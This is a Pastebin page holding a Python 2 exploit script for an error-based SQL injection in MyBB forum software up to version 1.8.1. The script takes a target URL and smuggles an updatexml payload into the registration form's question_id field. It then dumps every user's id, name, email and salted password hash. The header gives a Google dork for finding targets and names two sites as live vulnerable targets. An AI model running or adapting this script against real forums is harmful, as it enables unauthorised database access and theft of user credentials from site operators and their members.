Guest User

MyBB 1.8.X <= 1.8.1 Error based SQL Injection

a guest
Nov 16th, 2014
813
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #!/usr/bin/env python
  2. # Exploit Title: MyBB 1.8.X <= 1.8.1 Error based SQL Injection
  3. # Date : 2014-11-15
  4. # Google Dork : intext:Powered By MyBB
  5. # Vendor Homepage: http://www.mybb.com/
  6. # Software Link: http://resources.mybb.com/downloads/mybb_1801.zip
  7. # Version: 1.8.X
  8. # Tested on: Linux / Python 2.7
  9. # Status : Patched in MyBB 1.8.2
  10. # Author : MakMan -- mak.man@live.com -- https://www.facebook.com/hackticlabs
  11. # Live Vulnerable Targets : http://livedemo.installatron.com/1416038193mybb/ : http://gamergate.community/
  12.  
  13. print '\n\n---------------------------------------------------------------------------------'
  14. print 'Script Coded by MakMan -- Hacktic Labs -- https://www.facebook.com/hackticlabs'
  15. print '-----------------------MyBB 1.8.X Error based SQL Injection---------------------'
  16. print '---------------------------------------------------------------------------------\n\n\n'
  17. url = raw_input('Enter URL http://www.exmaple.com/path_to_mybb :: ')
  18. url = url.rstrip('/')
  19. ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"
  20.  
  21. import sys, re
  22. import urllib2, urllib
  23.  
  24. def inject(sql):
  25. try:
  26. urllib2.urlopen(urllib2.Request('%s/member.php' % url, data="regcheck1=&regcheck2=true&username=makman&password=mukarram&password2=mukarram&email=mak@live.com&email2=mak@live.com&referrername=&imagestring=F7yR4&imagehash=1c1d0e6eae9c113f4ff65339e4b3079c&answer=4&allownotices=1&receivepms=1&pmnotice=1&subscriptionmethod=0&timezoneoffset=0&dstcorrection=2&regtime=1416039333&step=registration&action=do_register&regsubmit=Submit+Registration!&question_id=makman%s" % urllib.quote("\' and updatexml(NULL,concat (0x3a,(%s)),NULL) and \'1" % sql), headers={"User-agent": ua}))
  27. except urllib2.HTTPError, e:
  28. data = e.read()
  29. if e.code == 503:
  30. txt = re.search("XPATH syntax error: ':(.*)'", data, re.MULTILINE)
  31. if txt is not None:
  32. return txt.group(1)
  33. sys.exit('Error [3], received unexpected data:\n%s' % data)
  34. sys.exit('Not Vulnerable i guess !!!')
  35. sys.exit('Not Vulnerable or check your inernet connection !!')
  36.  
  37. def get(name, table, num):
  38. sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
  39. s = int(inject('LENGTH((%s))' % sqli))
  40. if s < 31:
  41. return inject(sqli)
  42. else:
  43. r = ''
  44. for i in range(1, s+1, 31):
  45. r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
  46. return r
  47.  
  48.  
  49. members_table= inject('select table_name from information_schema.tables where table_schema=database() and table_name regexp 0x757365727324 limit 0,1')
  50. n = inject('SELECT COUNT(*) FROM %s' % members_table)
  51. print '----------------------------------------------------------------------------'
  52. print '* Found %s users' % n
  53. print '----------------------------------------------------------------------------'
  54. for j in range(int(n)):
  55. print '{:20s} {:20s}'.format('Id',get('uid', members_table, j))
  56. print '{:20s} {:20s}'.format('Name',get('username', members_table, j))
  57. print '{:20s} {:20s}'.format('Email',get('email', members_table, j))
  58. print '{:20s} {:20s}'.format('Password : Salt',get('CONCAT(password,0x3a,salt)', members_table, j))
  59. print '----------------------------------------------------------------------------'
RAW Paste Data

Adblocker detected! Please consider disabling it...

We've detected AdBlock Plus or some other adblocking software preventing Pastebin.com from fully loading.

We don't have any obnoxious sound, or popup ads, we actively block these annoying types of ads!

Please add Pastebin.com to your ad blocker whitelist or disable your adblocking software.

×